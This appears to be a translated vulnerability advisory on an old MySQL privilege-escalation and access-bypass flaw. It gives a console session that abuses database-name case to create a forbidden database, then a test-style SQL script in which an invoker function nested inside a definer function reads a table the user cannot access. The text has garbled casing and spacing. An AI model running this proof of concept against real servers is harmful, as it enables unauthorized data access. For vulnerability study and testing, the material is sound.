MySQL privilege elevation and security restrictions Bypass vulnerability

Test method:

"Warning: The following procedures (methods) may be offensive, for security research and teaching purposes only." Users are at risk! 】

1. Create a database


$MySQL-H my.mysql.server-u sample-p-A sample
Enter Password:
Welcome to the MySQL Monitor. Commands End With; or G.
Your MySQL Connection ID is 263935 to server Version:4.1.16-standard

mysql> CREATE database another;
ERROR 1044:access denied for user ' sample ' @ '% ' to database ' another '

mysql> CREATE DATABASE SAmple;
Query OK, 1 row Affected (0.00 sec)


2. Privilege Promotion


--disable_warnings
Drop database if exists mysqltest1;
Drop database if exists mysqltest2;
Drop function if exists f_suid;
--enable_warnings

# Prepare Playground
Create Database Mysqltest1;
Create Database Mysqltest2;
Create user malory@localhost;
Grant all privileges on mysqltest1.* to malory@localhost;

# Create harmless (but suid!) function
Create function F_suid (i int) returns int return 0;
Grant execute on function test.f_suid to Malory@localhost;

Use Mysqltest2;
# Create table in which Malory@localhost would be interested but to which
# He won ' t have any access
CREATE TABLE t1 (i int);

Connect (Malcon, localhost, malory,,mysqltest1);

# correct malory@localhost don ' t have access to MYSQLTEST2.T1
--error Er_tableaccess_denied_error
SELECT * from Mysqltest2.t1;

# Create function which'll allow to exploit security hole
delimiter |;
Create function F_evil ()
returns int
SQL Security Invoker
Begin
Set @a:= current_user ();
Set @b:= (SELECT COUNT (*) from MYSQLTEST2.T1);
return 0;
end|
delimiter; |

# Again Correct
--error Er_tableaccess_denied_error
Select F_evil ();
Select @a, @b;

# OOPS!!! It seems that F_evil () are executed in the context of
# F_suid () Definer, so malory@locahost gets all info and he wants
Select Test.f_suid (F_evil ());
Select @a, @b;

Connection default;
Drop user malory@localhost;
Drop database Mysqltest1;
Drop database Mysqltest2;